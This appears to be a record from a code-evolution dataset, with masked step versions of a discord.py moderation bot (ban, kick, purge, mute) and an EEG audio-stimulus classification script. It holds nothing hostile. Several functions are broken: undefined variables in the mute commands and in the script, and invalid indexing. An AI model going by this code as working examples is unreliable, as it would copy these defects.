discord.Embed(title=f'`{ctx.author}` banned {member}',\n colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name='● Details:', value=f' - Reason: {reason}')\n embed.set_footer(icon_url=f'{ctx.author.avatar_url}', text=\n f'{ctx.author.top_role.name} ')\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command ban')\n\n @commands.command()\n @commands.has_permissions(ban_members=True)\n async def unban(self, ctx, member, *, reason='No reason'):\n print('unbanned')\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot unban yourself!')\n return\n try:\n member = await self.bot.fetch_user(int(member))\n await ctx.guild.unban(member, reason=reason)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n await ctx.send(f'`{member}` was unbanned by **{ctx.author.name}**.'\n )\n print(ctx.author.name, 'used the command unban')\n\n @commands.command(name='kick')\n @commands.has_permissions(kick_members=True)\n async def kick(self, ctx, member: discord.Member, *, reason='No reason'):\n \"\"\"Kicks someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot kick yourself!')\n return\n try:\n await member.kick(reason=reason)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `KICK_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n embed = discord.Embed(title=f'`{ctx.author}` kicked {member}',\n colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name='● Details:', value=f' - Reason: {reason}')\n embed.set_footer(icon_url=f'{ctx.author.avatar_url}', text=\n f'{ctx.author.top_role.name} ')\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command kick')\n\n @commands.command(name='clear')\n @commands.has_permissions(manage_messages=True)\n async def clear(self, ctx, amount: int):\n \"\"\"Clears messages.\"\"\"\n channel = ctx.channel\n try:\n await channel.purge(limit=amount + 1)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `MANAGE_MESSAGES` to do this. Please check my permissions and try running the command again.'\n )\n else:\n await ctx.send(f'{amount} messages deleted.')\n\n @clear.error\n async def clear_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\n \"You need to specify an amount of messages, i can't purge air...\"\n )\n if isinstance(error, commands.BadArgument):\n await ctx.send('Give me a valid number.')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @kick.error\n async def kick_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who to kick.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @ban.error\n async def ban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who to ban.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?.')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @commands.command()\n async def mute(self, ctx, user: Sinner, reason=None):\n \"\"\"Mutes a user.\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot mute yourself!')\n return\n await mute(ctx, user, reason or 'treason')\n\n @commands.command()\n async def unmute(self, ctx, user: Redeemed):\n \"\"\"Unmutes a muted user\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot unmute yourself!')\n return\n await user.remove_roles(discord.utils.get(ctx.guild.roles, name=\n 'Muted'))\n await ctx.send(f'{user.mention} has been unmuted')\n\n @mute.error\n async def mute_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to mute.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n @unmute.error\n async def unmute_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to unmute.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n @unban.error\n async def unban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to unban.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n\ndef setup(bot):\n bot.add_cog(Moderation(bot))\n",
"step-5": "import discord\nfrom discord.ext import commands\nimport datetime\nfrom discord.utils import get\nfrom discord import User\n\nclass Sinner(commands.Converter):\n async def convert(self, ctx, argument):\n argument = await commands.MemberConverter().convert(ctx, argument)\n permission = argument.guild_permissions.manage_messages \n if not permission:\n return argument \n else:\n raise commands.BadArgument(\"You cannot punish other staff members\") \n\n\nclass Redeemed(commands.Converter):\n async def convert(self, ctx, argument):\n argument = await commands.MemberConverter().convert(ctx, argument)\n muted = discord.utils.get(ctx.guild.roles, name=\"Muted\") \n if muted in argument.roles:\n return argument\n else:\n raise commands.BadArgument(\"The user was not muted.\") \n \n\nasync def mute(ctx, user, reason=\"No reason\"):\n role = discord.utils.get(ctx.guild.roles, name=\"Muted\") \n if not role: \n try: \n muted = await ctx.guild.create_role(name=\"Muted\", reason=\"To use for muting\")\n for channel in ctx.guild.channels: \n await channel.set_permissions(muted, send_messages=False,\n read_message_history=False,\n read_messages=False)\n except discord.Forbidden:\n return await ctx.send(\"I have no permissions to make a muted role\")\n await user.add_roles(muted) \n await ctx.send(f\"{user.mention} has been muted for {reason}\")\n else:\n await user.add_roles(role) \n await ctx.send(f\"{user.mention} has been muted for {reason}\")\n channel = ctx.bot.get_channel(718865797006753892)\n await channel.send(f\"{user.mention}, welcome to the bad kids club.\")\n\nclass Moderation(commands.Cog):\n \"\"\"Moderation Commands\"\"\"\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name=\"ban\")\n @commands.has_permissions(ban_members=True)\n async def ban(self, ctx, member: discord.Member, *, reason=\"No reason\"):\n \"\"\"Bans someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send(\"You cannot ban yourself!\")\n return\n try:\n memberid = await self.bot.fetch_user(int(member)) \n await member.ban(reason=reason) or await memberid.ban(reason=reason)\n except discord.Forbidden:\n await ctx.send(f\"It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.\") \n else:\n embed = discord.Embed(title=f\"`{ctx.author}` banned {member}\", colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name=\"● Details:\", value=f\" - Reason: {reason}\")\n embed.set_footer(icon_url=f\"{ctx.author.avatar_url}\", text=f\"{ctx.author.top_role.name} \")\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command ban')\n\n @commands.command()\n @commands.has_permissions(ban_members=True)\n async def unban(self, ctx, member, *, reason=\"No reason\"):\n print(\"unbanned\")\n if member == None or member == ctx.message.author:\n await ctx.send(\"You cannot unban yourself!\")\n return\n try:\n member = await self.bot.fetch_user(int(member))\n await ctx.guild.unban(member, reason=reason)\n except discord.Forbidden:\n await ctx.send(f\"It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.\")\n else:\n await ctx.send(f\"`{member}` was unbanned by **{ctx.author.name}**.\")\n print(ctx.author.name, 'used the command unban')\n\n @commands.command(name=\"kick\")\n @commands.has_permissions(kick_members=True)\n async def kick(self, ctx, member: discord.Member, *, reason=\"No reason\"):\n \"\"\"Kicks someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send(\"You cannot kick yourself!\")\n return\n try:\n await member.kick(reason=reason)\n except discord.Forbidden: \n await ctx.send(f\"It looks like i dont have the permission `KICK_MEMBERS` to do this. Please check my permissions and try running the command again.\")\n else:\n embed = discord.Embed(title=f\"`{ctx.author}` kicked {member}\", colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name=\"● Details:\", value=f\" - Reason: {reason}\")\n embed.set_footer(icon_url=f\"{ctx.author.avatar_url}\", text=f\"{ctx.author.top_role.name} \")\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command kick')\n\n\n @commands.command(name=\"clear\")\n @commands.has_permissions(manage_messages=True)\n async def clear(self, ctx, amount: int):\n \"\"\"Clears messages.\"\"\"\n channel = ctx.channel\n try:\n await channel.purge(limit=amount+1)\n except discord.Forbidden:\n await ctx.send(f\"It looks like i dont have the permission `MANAGE_MESSAGES` to do this. Please check my permissions and try running the command again.\")\n else:\n await ctx.send(f\"{amount} messages deleted.\")\n\n @clear.error\n async def clear_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"You need to specify an amount of messages, i can't purge air...\")\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Give me a valid number.\")\n if isinstance(error, commands.CheckFailure):\n await ctx.send(f\"{ctx.author.name}, you don't have permission to use this command.\") \n\n raise error \n\n @kick.error\n async def kick_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"You need to tell me who to kick.\")\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Is that a person?\")\n if isinstance(error, commands.CheckFailure):\n await ctx.send(f\"{ctx.author.name}, you don't have permission to use this command.\") \n\n raise error \n\n\n @ban.error\n async def ban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"You need to tell me who to ban.\")\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Is that a person?.\")\n if isinstance(error, commands.CheckFailure):\n await ctx.send(f\"{ctx.author.name}, you don't have permission to use this command.\") \n\n raise error\n\n @commands.command()\n async def mute(self, ctx, user: Sinner, reason=None):\n \"\"\"Mutes a user.\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send(\"You cannot mute yourself!\")\n return \n await mute(ctx, user, reason or \"treason\")\n\n @commands.command()\n async def unmute(self, ctx, user: Redeemed):\n \"\"\"Unmutes a muted user\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send(\"You cannot unmute yourself!\")\n return \n await user.remove_roles(discord.utils.get(ctx.guild.roles, name=\"Muted\"))\n await ctx.send(f\"{user.mention} has been unmuted\")\n\n\n @mute.error\n async def mute_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"You need to tell me who do you want to mute.\")\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Is that a person?\")\n if isinstance(error, commands.CheckFailure):\n await ctx.send(f\"{ctx.author.name}, you don't have permissions to use this command.\")\n\n @unmute.error\n async def unmute_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"You need to tell me who do you want to unmute.\")\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Is that a person?\")\n if isinstance(error, commands.CheckFailure):\n await ctx.send(f\"{ctx.author.name}, you don't have permissions to use this command.\")\n\n @unban.error\n async def unban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"You need to tell me who do you want to unban.\")\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Is that a person?\")\n if isinstance(error, commands.CheckFailure):\n await ctx.send(f\"{ctx.author.name}, you don't have permissions to use this command.\")\n\ndef setup(bot):\n bot.add_cog(Moderation(bot))\n",
"step-ids": [
4,
5,
7,
8,
9
]
}
|
[
4,
5,
7,
8,
9
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 7 03:41:18 2020
@author: owlthekasra
"""
import methods as md
import add_label as al
import numpy as np
import pandas as pd
import random
sb_rd_1 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_2'
sb_rd_2 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_3'
sb_rd_3 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/extra_deleted_metadata'
ns_rd_1 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_1'
ns_rd_2 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_2'
sbt_rd_1 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass_thought/trials_1'
df_sine_bass_trials = al.get_long_dataframe(sb_rd_1).append(al.get_long_dataframe(sb_rd_2))
df_no_sound_trials = al.get_long_dataframe(ns_rd_1).append(al.get_long_dataframe(ns_rd_2))
df_sine_bass_thought_trials = al.get_long_dataframe(sbt_rd_1)
# _, df_sine_bass_extra = al.get_all_dataframes(sb_rd_3, 1)
# _, df_sine_bass_trials_2 = al.get_all_dataframes(sb_rd_1, 1)
# _, df_sine_bass_trials_3 = al.get_all_dataframes(sb_rd_2, 1)
# _, df_no_sound_trials_1 = al.get_all_dataframes(ns_rd_1, 0)
# _, df_no_sound_trials_2 = al.get_all_dataframes(ns_rd_2, 0)
# _, df_sine_bass_thought_trials_1 = al.get_all_dataframes(sbt_rd_1, 2)
# diff_labels = [df_sine_bass_thought_trials_1, df_sine_bass_extra, df_sine_bass_trials_2, df_sine_bass_trials_3, df_no_sound_trials_1, df_no_sound_trials_2]
# big_frame = pd.concat(diff_labels, ignore_index=True)
# bg = big_frame.iloc[:, :513]
# sound = bg[bg["label"]==1].iloc[:,1:]
# nosound = bg[bg["label"]==0].iloc[:,1:]
# imagesound = bg[bg["label"]==2].iloc[:,1:]
def get_X_and_y(df, start=1):
y = df[['label']]
X = df[:, start:]
return (X, y)
def subtract_moving_average(df, n=50):
k = n
bgnorm = pd.DataFrame(np.zeros((len(df), len(df.columns))))
for j in range(0, len(df)):
for i in range(0, len(df.columns)):
#define indices
indices = range(max(1, i-k), min(i+k, len(df.columns)));
avg = df.iloc[j, :]
avg = avg.iloc[indices].mean()
newnum = df.iloc[j, i] - avg
print(newnum)
bgnorm.iloc[j, i] = newnum
return bgnorm
# #preprocess thought sine wave only
# y_values_thought = df_sine_bass_thought_trials_1.iloc[:, 0]
# X_values_thought = df_sine_bass_thought_trials_1.iloc[:, 132:660]
# df_thought = pd.concat([y_values_thought, X_values_thought], axis=1, ignore_index=True)
snd = pd.DataFrame()
# sn2 = sound.reset_index().iloc[:,1:].T
for i in range(0, int(len(sound)/4)):
snd = pd.concat([snd, sound.iloc[i*4:i*4+4, :]], axis = 1)
#separate channels into different dataframes
bg1 = bg.iloc[::4, :]
bg2 = bg.iloc[1::4, :]
bg3 = bg.iloc[2::4, :]
bg4 = bg.iloc[3::4, :]
bigX = bg.iloc[:, 1:]
bigy = bg.iloc[:,0]
#subtracting average of each row
bigX = lab.iloc[:, 1:]
len(bigX.columns)
len(bigX)
bgnorm = subtract_moving_average(bigX)
bgnormlab = pd.concat([bigy, bgnorm], axis=1)
bgnormlab.to_csv('bgnormalized3600x517.csv')
bgnormlab = pd.read_csv('/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/csv/bgnormalized3600x517.csv')
j3 = pd.DataFrame()
def get_mean_down_df(df, nchan=4 ):
avg_df = pd.DataFrame()
for i in range(1, len(df)+1):
if ((i % nchan) == 0):
j5 = range(i-nchan,i)
j1 = df.iloc[j5, :]
k1 = j1.mean()
avg_df = avg_df.append(k1, ignore_index=True)
return avg_df
j5 = range(0,8)
j1 = bigX.iloc[j5, :]
bgnormavg = get_mean_down_df(bgnormlab)
lab = bgnormavg.iloc[:,-1]
lab = lab.append(bgnormavg.iloc[:,:-1])
indices = range(397, 417)
j1 = lab.iloc[1, :].iloc[1:]
j2 = j1.iloc[indices]
j3 = j2.mean()
random.seed(100)
# bssss = bgnormavg.drop(columns=['Unnamed: 0'])
main = bg1.sample(frac=1)
main = main.reset_index()
main = main.iloc[:, 1:]
train = main.iloc[:650]
val = main.iloc[650:]
# main2 = main.sample(frac=1)
X_train = main.iloc[:, 1:]
y_train = main['label']
X_val = val.iloc[:, 1:]
y_val = val['label']
model, acc, pred, y_test = md.fitPredictValSet(X_train, y_train, X_val, y_val, 'tree')
print(indices)
|
normal
|
{
"blob_id": "54d714d1e4d52911bcadf3800e7afcc2c9a615a5",
"index": 6743,
"step-1": "<mask token>\n\n\ndef subtract_moving_average(df, n=50):\n k = n\n bgnorm = pd.DataFrame(np.zeros((len(df), len(df.columns))))\n for j in range(0, len(df)):\n for i in range(0, len(df.columns)):\n indices = range(max(1, i - k), min(i + k, len(df.columns)))\n avg = df.iloc[j, :]\n avg = avg.iloc[indices].mean()\n newnum = df.iloc[j, i] - avg\n print(newnum)\n bgnorm.iloc[j, i] = newnum\n return bgnorm\n\n\n<mask token>\n\n\ndef get_mean_down_df(df, nchan=4):\n avg_df = pd.DataFrame()\n for i in range(1, len(df) + 1):\n if i % nchan == 0:\n j5 = range(i - nchan, i)\n j1 = df.iloc[j5, :]\n k1 = j1.mean()\n avg_df = avg_df.append(k1, ignore_index=True)\n return avg_df\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_X_and_y(df, start=1):\n y = df[['label']]\n X = df[:, start:]\n return X, y\n\n\ndef subtract_moving_average(df, n=50):\n k = n\n bgnorm = pd.DataFrame(np.zeros((len(df), len(df.columns))))\n for j in range(0, len(df)):\n for i in range(0, len(df.columns)):\n indices = range(max(1, i - k), min(i + k, len(df.columns)))\n avg = df.iloc[j, :]\n avg = avg.iloc[indices].mean()\n newnum = df.iloc[j, i] - avg\n print(newnum)\n bgnorm.iloc[j, i] = newnum\n return bgnorm\n\n\n<mask token>\nfor i in range(0, int(len(sound) / 4)):\n snd = pd.concat([snd, sound.iloc[i * 4:i * 4 + 4, :]], axis=1)\n<mask token>\nlen(bigX.columns)\nlen(bigX)\n<mask token>\nbgnormlab.to_csv('bgnormalized3600x517.csv')\n<mask token>\n\n\ndef get_mean_down_df(df, nchan=4):\n avg_df = pd.DataFrame()\n for i in range(1, len(df) + 1):\n if i % nchan == 0:\n j5 = range(i - nchan, i)\n j1 = df.iloc[j5, :]\n k1 = j1.mean()\n avg_df = avg_df.append(k1, ignore_index=True)\n return avg_df\n\n\n<mask token>\nrandom.seed(100)\n<mask token>\nprint(indices)\n",
"step-3": "<mask token>\nsb_rd_1 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_2'\n )\nsb_rd_2 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_3'\n )\nsb_rd_3 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/extra_deleted_metadata'\n )\nns_rd_1 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_1'\n )\nns_rd_2 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_2'\n )\nsbt_rd_1 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass_thought/trials_1'\n )\ndf_sine_bass_trials = al.get_long_dataframe(sb_rd_1).append(al.\n get_long_dataframe(sb_rd_2))\ndf_no_sound_trials = al.get_long_dataframe(ns_rd_1).append(al.\n get_long_dataframe(ns_rd_2))\ndf_sine_bass_thought_trials = al.get_long_dataframe(sbt_rd_1)\n\n\ndef get_X_and_y(df, start=1):\n y = df[['label']]\n X = df[:, start:]\n return X, y\n\n\ndef subtract_moving_average(df, n=50):\n k = n\n bgnorm = pd.DataFrame(np.zeros((len(df), len(df.columns))))\n for j in range(0, len(df)):\n for i in range(0, len(df.columns)):\n indices = range(max(1, i - k), min(i + k, len(df.columns)))\n avg = df.iloc[j, :]\n avg = avg.iloc[indices].mean()\n newnum = df.iloc[j, i] - avg\n print(newnum)\n bgnorm.iloc[j, i] = newnum\n return bgnorm\n\n\nsnd = pd.DataFrame()\nfor i in range(0, int(len(sound) / 4)):\n snd = pd.concat([snd, sound.iloc[i * 4:i * 4 + 4, :]], axis=1)\nbg1 = bg.iloc[::4, :]\nbg2 = bg.iloc[1::4, :]\nbg3 = bg.iloc[2::4, :]\nbg4 = bg.iloc[3::4, :]\nbigX = bg.iloc[:, 1:]\nbigy = bg.iloc[:, 0]\nbigX = lab.iloc[:, 1:]\nlen(bigX.columns)\nlen(bigX)\nbgnorm = subtract_moving_average(bigX)\nbgnormlab = pd.concat([bigy, bgnorm], axis=1)\nbgnormlab.to_csv('bgnormalized3600x517.csv')\nbgnormlab = pd.read_csv(\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/csv/bgnormalized3600x517.csv'\n )\nj3 = pd.DataFrame()\n\n\ndef get_mean_down_df(df, nchan=4):\n avg_df = pd.DataFrame()\n for i in range(1, len(df) + 1):\n if i % nchan == 0:\n j5 = range(i - nchan, i)\n j1 = df.iloc[j5, :]\n k1 = j1.mean()\n avg_df = avg_df.append(k1, ignore_index=True)\n return avg_df\n\n\nj5 = range(0, 8)\nj1 = bigX.iloc[j5, :]\nbgnormavg = get_mean_down_df(bgnormlab)\nlab = bgnormavg.iloc[:, -1]\nlab = lab.append(bgnormavg.iloc[:, :-1])\nindices = range(397, 417)\nj1 = lab.iloc[1, :].iloc[1:]\nj2 = j1.iloc[indices]\nj3 = j2.mean()\nrandom.seed(100)\nmain = bg1.sample(frac=1)\nmain = main.reset_index()\nmain = main.iloc[:, 1:]\ntrain = main.iloc[:650]\nval = main.iloc[650:]\nX_train = main.iloc[:, 1:]\ny_train = main['label']\nX_val = val.iloc[:, 1:]\ny_val = val['label']\nmodel, acc, pred, y_test = md.fitPredictValSet(X_train, y_train, X_val,\n y_val, 'tree')\nprint(indices)\n",
"step-4": "<mask token>\nimport methods as md\nimport add_label as al\nimport numpy as np\nimport pandas as pd\nimport random\nsb_rd_1 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_2'\n )\nsb_rd_2 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_3'\n )\nsb_rd_3 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/extra_deleted_metadata'\n )\nns_rd_1 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_1'\n )\nns_rd_2 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_2'\n )\nsbt_rd_1 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass_thought/trials_1'\n )\ndf_sine_bass_trials = al.get_long_dataframe(sb_rd_1).append(al.\n get_long_dataframe(sb_rd_2))\ndf_no_sound_trials = al.get_long_dataframe(ns_rd_1).append(al.\n get_long_dataframe(ns_rd_2))\ndf_sine_bass_thought_trials = al.get_long_dataframe(sbt_rd_1)\n\n\ndef get_X_and_y(df, start=1):\n y = df[['label']]\n X = df[:, start:]\n return X, y\n\n\ndef subtract_moving_average(df, n=50):\n k = n\n bgnorm = pd.DataFrame(np.zeros((len(df), len(df.columns))))\n for j in range(0, len(df)):\n for i in range(0, len(df.columns)):\n indices = range(max(1, i - k), min(i + k, len(df.columns)))\n avg = df.iloc[j, :]\n avg = avg.iloc[indices].mean()\n newnum = df.iloc[j, i] - avg\n print(newnum)\n bgnorm.iloc[j, i] = newnum\n return bgnorm\n\n\nsnd = pd.DataFrame()\nfor i in range(0, int(len(sound) / 4)):\n snd = pd.concat([snd, sound.iloc[i * 4:i * 4 + 4, :]], axis=1)\nbg1 = bg.iloc[::4, :]\nbg2 = bg.iloc[1::4, :]\nbg3 = bg.iloc[2::4, :]\nbg4 = bg.iloc[3::4, :]\nbigX = bg.iloc[:, 1:]\nbigy = bg.iloc[:, 0]\nbigX = lab.iloc[:, 1:]\nlen(bigX.columns)\nlen(bigX)\nbgnorm = subtract_moving_average(bigX)\nbgnormlab = pd.concat([bigy, bgnorm], axis=1)\nbgnormlab.to_csv('bgnormalized3600x517.csv')\nbgnormlab = pd.read_csv(\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/csv/bgnormalized3600x517.csv'\n )\nj3 = pd.DataFrame()\n\n\ndef get_mean_down_df(df, nchan=4):\n avg_df = pd.DataFrame()\n for i in range(1, len(df) + 1):\n if i % nchan == 0:\n j5 = range(i - nchan, i)\n j1 = df.iloc[j5, :]\n k1 = j1.mean()\n avg_df = avg_df.append(k1, ignore_index=True)\n return avg_df\n\n\nj5 = range(0, 8)\nj1 = bigX.iloc[j5, :]\nbgnormavg = get_mean_down_df(bgnormlab)\nlab = bgnormavg.iloc[:, -1]\nlab = lab.append(bgnormavg.iloc[:, :-1])\nindices = range(397, 417)\nj1 = lab.iloc[1, :].iloc[1:]\nj2 = j1.iloc[indices]\nj3 = j2.mean()\nrandom.seed(100)\nmain = bg1.sample(frac=1)\nmain = main.reset_index()\nmain = main.iloc[:, 1:]\ntrain = main.iloc[:650]\nval = main.iloc[650:]\nX_train = main.iloc[:, 1:]\ny_train = main['label']\nX_val = val.iloc[:, 1:]\ny_val = val['label']\nmodel, acc, pred, y_test = md.fitPredictValSet(X_train, y_train, X_val,\n y_val, 'tree')\nprint(indices)\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 7 03:41:18 2020\n\n@author: owlthekasra\n\"\"\"\n\nimport methods as md\nimport add_label as al\nimport numpy as np\nimport pandas as pd\nimport random\n\nsb_rd_1 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_2'\nsb_rd_2 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_3'\nsb_rd_3 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/extra_deleted_metadata'\nns_rd_1 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_1'\nns_rd_2 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_2'\nsbt_rd_1 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass_thought/trials_1'\n\ndf_sine_bass_trials = al.get_long_dataframe(sb_rd_1).append(al.get_long_dataframe(sb_rd_2))\ndf_no_sound_trials = al.get_long_dataframe(ns_rd_1).append(al.get_long_dataframe(ns_rd_2))\ndf_sine_bass_thought_trials = al.get_long_dataframe(sbt_rd_1)\n\n# _, df_sine_bass_extra = al.get_all_dataframes(sb_rd_3, 1)\n# _, df_sine_bass_trials_2 = al.get_all_dataframes(sb_rd_1, 1)\n# _, df_sine_bass_trials_3 = al.get_all_dataframes(sb_rd_2, 1)\n# _, df_no_sound_trials_1 = al.get_all_dataframes(ns_rd_1, 0)\n# _, df_no_sound_trials_2 = al.get_all_dataframes(ns_rd_2, 0)\n# _, df_sine_bass_thought_trials_1 = al.get_all_dataframes(sbt_rd_1, 2)\n\n# diff_labels = [df_sine_bass_thought_trials_1, df_sine_bass_extra, df_sine_bass_trials_2, df_sine_bass_trials_3, df_no_sound_trials_1, df_no_sound_trials_2]\n# big_frame = pd.concat(diff_labels, ignore_index=True)\n# bg = big_frame.iloc[:, :513]\n\n# sound = bg[bg[\"label\"]==1].iloc[:,1:]\n# nosound = bg[bg[\"label\"]==0].iloc[:,1:]\n# imagesound = bg[bg[\"label\"]==2].iloc[:,1:]\n\n\n\n\n\ndef get_X_and_y(df, start=1):\n y = df[['label']]\n X = df[:, start:]\n return (X, y)\n\ndef subtract_moving_average(df, n=50):\n k = n\n bgnorm = pd.DataFrame(np.zeros((len(df), len(df.columns))))\n for j in range(0, len(df)):\n for i in range(0, len(df.columns)):\n #define indices\n indices = range(max(1, i-k), min(i+k, len(df.columns)));\n avg = df.iloc[j, :]\n avg = avg.iloc[indices].mean()\n newnum = df.iloc[j, i] - avg\n print(newnum)\n bgnorm.iloc[j, i] = newnum\n return bgnorm\n\n# #preprocess thought sine wave only\n# y_values_thought = df_sine_bass_thought_trials_1.iloc[:, 0]\n# X_values_thought = df_sine_bass_thought_trials_1.iloc[:, 132:660]\n# df_thought = pd.concat([y_values_thought, X_values_thought], axis=1, ignore_index=True)\n\n\nsnd = pd.DataFrame()\n# sn2 = sound.reset_index().iloc[:,1:].T\nfor i in range(0, int(len(sound)/4)):\n snd = pd.concat([snd, sound.iloc[i*4:i*4+4, :]], axis = 1)\n\n#separate channels into different dataframes\nbg1 = bg.iloc[::4, :]\nbg2 = bg.iloc[1::4, :]\nbg3 = bg.iloc[2::4, :]\nbg4 = bg.iloc[3::4, :]\n\nbigX = bg.iloc[:, 1:]\nbigy = bg.iloc[:,0]\n\n\n#subtracting average of each row\nbigX = lab.iloc[:, 1:]\nlen(bigX.columns)\nlen(bigX)\nbgnorm = subtract_moving_average(bigX)\n\n\nbgnormlab = pd.concat([bigy, bgnorm], axis=1)\n\nbgnormlab.to_csv('bgnormalized3600x517.csv')\n\nbgnormlab = pd.read_csv('/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/csv/bgnormalized3600x517.csv')\n\nj3 = pd.DataFrame()\ndef get_mean_down_df(df, nchan=4 ):\n avg_df = pd.DataFrame()\n for i in range(1, len(df)+1):\n if ((i % nchan) == 0):\n j5 = range(i-nchan,i)\n j1 = df.iloc[j5, :]\n k1 = j1.mean()\n avg_df = avg_df.append(k1, ignore_index=True)\n return avg_df\n\nj5 = range(0,8)\nj1 = bigX.iloc[j5, :]\n \nbgnormavg = get_mean_down_df(bgnormlab)\nlab = bgnormavg.iloc[:,-1]\nlab = lab.append(bgnormavg.iloc[:,:-1])\n\n\nindices = range(397, 417)\nj1 = lab.iloc[1, :].iloc[1:]\nj2 = j1.iloc[indices]\nj3 = j2.mean()\n\nrandom.seed(100)\n# bssss 